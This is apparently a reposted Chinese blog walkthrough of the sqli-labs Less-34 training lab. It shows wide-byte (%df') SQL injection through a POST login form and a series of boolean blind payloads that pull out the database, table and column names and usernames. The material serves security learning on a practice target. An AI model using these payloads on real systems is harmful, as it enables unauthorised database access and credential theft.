当前位置:网站首页>SQL注入 Less34(POST型宽字节注入+布尔盲注)
SQL注入 Less34(POST型宽字节注入+布尔盲注)
2022-07-28 20:30:00 【开心星人】
前置知识:【Try to Hack】宽字节注入

尝试万能密码' or 1#
进行了转义,使用宽字节注入%df' or 1#
发现没有效果,并且%df直接显示出来了(之前都是显示不出来,是一个问号的图形)
抓包,发现对%进行了URL编码1%25df%27+or+1%23
我们用burp进行宽字节注入即可%df' or 1#
%df' or length(database())=8#
%df' or ascii(substr(database(),1,1))=115#
%df' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#
%df' or ascii(substr((select column_name from information _schema.columns where table_name="users" limit 0,1),1,1))=105#
因为"users"用到了引号,使用子查询或者16进制方式(十六进制成功了,但子查询,出来点问题)%df' or ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))=105#
%df' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=(select table_schema from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)),1,1))=105#
%df' or ascii(substr((select username from users limit 0,1), 1,1))=68#
边栏推荐
- Lvs+keepalived high availability deployment practical application
- 90. Subset II
- Brief introduction to PCB materials
- Clearing of applet component timer
- HCIP(8)
- Have you seen the management area decoupling architecture? Can help customers solve big problems
- [machine learning] naive Bayesian classification of text -- Classification of people's names and countries
- In Kingbase, the user is specified to search the schema by default, or the user cannot use the function under the public schema
- HCIP(9)
- Openeuler embedded sig | distributed soft bus
猜你喜欢
随机推荐
第 7 篇:绘制旋转立方体
Msfvenom makes master and controlled terminals
HCIP(11)
No swagger, what do I use?
DHCP and PPPoE protocols and packet capture analysis
【云原生之kubernetes】在kubernetes集群下的映射外部服务—Eendpoint
Soft test --- database (3) data operation
什么是时间复杂度
Learning notes and summary of C language programming specification
HCIP第七次实验
Explain the remote debugging program of visual studio 2015 in LAN
Open earphone which air conduction earphone with good sound quality and recognized sound quality is recommended
Apifox:满足你对 Api 的所有幻想
ESP8266-Arduino编程实例-SPIFFS及数据上传(Arduino IDE和PlatformIO IDE)
HYDAC overflow valve db08a-01-c-n-500v
typeof原理
Have you seen the management area decoupling architecture? Can help customers solve big problems
Two global variables__ Dirname and__ Further introduction to common functions of filename and FS modules
Pyqt5 rapid development and actual combat 5.4 web page interaction
罗克韦尔AB PLC RSLogix数字量IO模块基本介绍




![[LiteratureReview]Object Detection and Mapping with Bounding Box Constraints](/img/37/7cb5fa3a9078a5f5947485147c819d.png)




